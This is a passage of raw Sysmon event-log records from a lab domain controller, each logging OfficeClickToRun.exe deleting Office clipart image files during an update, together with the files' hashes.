23542300x800000000000000066492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02753U.BMPMD5=58F00117E8E2355B324855D94AA142B6,SHA256=2C3C77521F667A8E0D13C645A9A10D2C236011EBF6270A1250E8B13350369EF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02752U.BMPMD5=D479836E6EA0E702BAD90193AB1FA83E,SHA256=51CE6CEDB7391B73E62F32D9D88F6C0194336851469C32550F44E5F90CFE763D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02752G.GIFMD5=4E9CB224B803C0E409852161F0A322DC,SHA256=A1ECCFD8D40AD97C64B5DD7628E40A890F2C2EAAE111634FF9236780FFEF1054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02750U.BMPMD5=A0D9A92538395226CAB4C2CB6209FD4D,SHA256=14336E1CE7EC916703CA11986A9DFE17C4A52434E38B69A874FEDE47148F25C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02750G.GIFMD5=B9738F7F68BC34AECDE4C1AF8EBAE062,SHA256=251D90EE49EDBEABCF2A7CE3B6CF2B679BDDEBCFD39D2B1A7582A5C787F01783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02749U.BMPMD5=FCF760C2F92DE6C71251AAA978CEDEFA,SHA256=E03A5EECD4FE69674D43D8D2D0DD3244F427D37A8BA41A32AAF83B8FB365EC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02749G.GIFMD5=581189C7D714C47C7DF9E2A4E8CABA3B,SHA256=94B0DE85CFBBBBDBB8C6523EF77C8B1BB48DC300763CF12420FE3AE1791E41E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02748U.BMPMD5=FFB521A49D5286A08BD4CDA80D6EAF57,SHA256=967750FCF886BB155E8A9F15653D8EE0F2C140B6A08C7885CD11D07B5E16D515,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02748G.GIFMD5=8F833E6C5D909B0C5DC3C8E67E386669,SHA256=75F334A44F0C1C047FC3F17A272BB1E14E5184493AFE097FF65C2E43374DAD76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02746U.BMPMD5=55D97DABA6570B7516CFB2421BF93896,SHA256=E8238981358056315AA1BCF93F67A7F98571A92CB9DECF0B8C98FF193737744F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02746G.GIFMD5=DBD1C4C6D02738F9CC8C64DD837BD7AA,SHA256=10D7762FD6D5586E350F5DE65C1E4AC6C154207D8651B5E3DAD4394BC5104361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02743G.GIFMD5=472628DBBC47B98C8CF2FE3839838600,SHA256=FF105068B5A499FEFE00A7D29083176E88383CB6E0E0F31DED913B3ECE346432,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02742U.BMPMD5=913DE6666719EA82F0D8501835E226BF,SHA256=236266652EA1701275AC1CBB9FFBB666A044966FD6D1E0865E74CF897016E88E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02742G.GIFMD5=52DA7919A284FBEC15231DBE7C259A1B,SHA256=13FF712C4B0858D9E6701D4C998C6264C98E82822E96BD6DFC1E39F00473B65C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02740U.BMPMD5=1A793A29DED4FCDB70B2B0B0D6329BF4,SHA256=2FBFFFF9CE1404BB22215019EAA7B96FD29BB745A5CD7F0DC5CBBE85FA551D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02740G.GIFMD5=BDBFA6715CA0B04860019D2D0D7709A5,SHA256=3E35AB98B852999E341C4A9662E1B6D22B0C6833E0BA3601C5E13F69D789E21B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02738U.BMPMD5=59EFA68551F0E2F1F168428A7E0D035C,SHA256=2E6452CA2E4EF72D24AAFE66ADB566D9C0699DDBB3FDB3606859E0F8B122B552,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02736U.BMPMD5=B79FE2E3CA9CCC58CC76C16AAE05157F,SHA256=B7B6CBAFA724571C39D4472DE5B1183C9CFE7F22C7DDFB0C8A32EE15F87DF844,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02736G.GIFMD5=7DFF15D6982BBD3CB45B68EDE3A4A3C1,SHA256=EE659AB99298F506096FBA2F323E46BB663DF8AD381394981F14601B3E919E85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02567J.JPGMD5=0AE5DCFCC462ED2FF3FCC3642F596FFE,SHA256=2DBC77741B2DD4C2AECEA89322EDCAD3410EAB13DC5925AEBCD433AA6048B2BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02503U.BMPMD5=83474E0DE01733F0D0699D65CA7D5CFD,SHA256=C10C12E9CD80F08A7573B7ECB9901DFB57326542805CCD4607746E073136F4E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02470U.BMPMD5=833FA6D98594A3BAAE8E5CCE605089A1,SHA256=21E9CBD625D29584BF228F3DFA48798181230E593D68A01CC5ECD8AE8A807B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02466U.BMPMD5=FA1830FB91BF6D20452090BF5D8678F0,SHA256=761A9D746D73DD94DDFA76BFC2398E3E86E2D64F6AF96D589E78C673071E603A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02417U.BMPMD5=6DFFE750F8AA233AD074EFDA6310240C,SHA256=24AEC1EA3FD2AF55DDE8F74B6AAB8F2AC004B9F322C0099F53B9DA25EB2CEB2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02412K.JPGMD5=B88F2EAE1D70A4E230F075B8205C5EBC,SHA256=5D357F1ABF9253D24A0DA341048C1DBAD54E928BE72DEE14F0AAB0C5C6C4B39C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02398U.BMPMD5=B39845C66904F2939D3207F98C9424B1,SHA256=7703EF0D27B7ABEE3DA61A3BA6BAAFF69D18C8E4572DB0286CCEF61474D2BCEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02291U.BMPMD5=B52BF73F30BE75E93ED18CD9BF7064F0,SHA256=4E1FFE7126C7746B84105B31FB5F72632D07B48D350C81F1181BA5CBB416F96E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02223U.BMPMD5=1CB99145974364EFC4BF2F9270EBDCC6,SHA256=585510BAD37F043A15587ECACA4468CED3F5AB5FA6C8A1BF45C9EDFEBB9BA668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02208U.BMPMD5=0BB4DC75AF21140D8CAB57FE6D2AB4E2,SHA256=04D4BAD167F8F3ED7C84ED67085653CBC2A803967906FE2B224279833580EC67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02074U.BMPMD5=9FE8401115BF0A3FACC8DC5A8ECA7D74,SHA256=F87C88FEF339BAA91FA5963AD5343D04B4AED6D65AFBF17293AD7C8622F543E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02071U.BMPMD5=F951647FFF958DD2A3DA820CC3353963,SHA256=364892B866B2F2E4F03CBC921CD0D90C9B645CF237A3D01076C91D7F2268708F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02069J.JPGMD5=AC2728F64AAD121FDABBBD24A8187CCB,SHA256=61DD89788E6FB02A8D7F02F76492A99AA0B3DA3A15578A3614FE60F767406B87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02062U.BMPMD5=25A92AF06BF45FB45B78D649C1D92F5D,SHA256=E0F330803F5EEE160DE87926D1972DE6C63F6D66A0BCEC65880F6408EC44F3AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02058U.BMPMD5=87E42A10F3479E5C6D8FC63923A97B24,SHA256=73C19B416523FEBD37615D007491143AE6F011870745BCD94452A4CCAECBC9F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02053J.JPGMD5=9FE081A94F7A7D24F3BD1036128CEBD9,SHA256=B099D2A6CBF652E6B8FA74545841A66A9D828C2D6A1931D64E1686C354AC0CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02040U.BMPMD5=E9C917D5F255FD106CBA3833EC55FA04,SHA256=F8B5C38574A7356CD70F4777F3FE953591DFD780AA4CA0D2D1EB76AD8E8C362D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02039U.BMPMD5=57C1A360DD6B359D39E4C1E2610BF887,SHA256=DEDCF57E0F7AB6484EC58631C713CEAA6D96011222B4E393A690B70B1A12045B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH02028K.JPGMD5=CE8823F26BCBAE288F7980285635B346,SHA256=C32473C545C76F6FC1353DBC3BDD9136193E90611E67F482479966E183B3E700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01931J.JPGMD5=D0F88DADB9B5933AF10207D6FE305331,SHA256=8626A498A2985EE64CB03C4C950669045D321AF8E0CDE0B8A354FE193A61179B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01607U.BMPMD5=8650E6C931CA2DDCF09D00E7058AC0F9,SHA256=2BE44C75DC994E3A80672EFDBAD6AD7CC08B04C13E4775273485B8E1C49CF5C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01562U.BMPMD5=B27A3EFD7926D72886887B6587404FDA,SHA256=30E6789A2191C6F06C4FD88E832BB5A998DECF4220FB5433E7A06D39C997231F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01478U.BMPMD5=2A5EB62C21F14223D7DD7B8D4F655B6F,SHA256=0851B1A122BDF627BCEF497BD43FCA2A52EE49C791D35DB8A82232656C37AEFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01332U.BMPMD5=B28180AF3FA979DAF2D9E0E7D915FBEF,SHA256=A0DF9541871DCE6FB75A0DC6F39D0C3097F250417ED11440C324D3D5B62CB1F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PH01265U.BMPMD5=E8D966CBFD6EDB53CFBB746B4F1E403A,SHA256=1D8BC1B34C186ED3D0F53FAC579282190B7A76EA0FDF761977AD41F260FDB2F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 